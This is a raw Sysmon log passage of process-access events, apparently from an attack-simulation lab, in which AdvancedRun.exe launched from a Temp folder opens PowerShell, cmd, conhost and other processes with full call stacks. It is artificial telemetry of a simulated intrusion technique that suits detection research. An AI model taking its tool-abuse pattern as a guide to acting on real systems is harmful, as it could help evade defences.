KRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080518Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132D-61EB-5A08-000000002702}4608c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080517Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5908-000000002702}1164C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080516Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-132A-61EB-5808-000000002702}3136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080515Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080514Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080513Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080512Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080511Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.469{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080510Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080509Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080508Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080507Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080506Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080505Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.468{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004080504Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 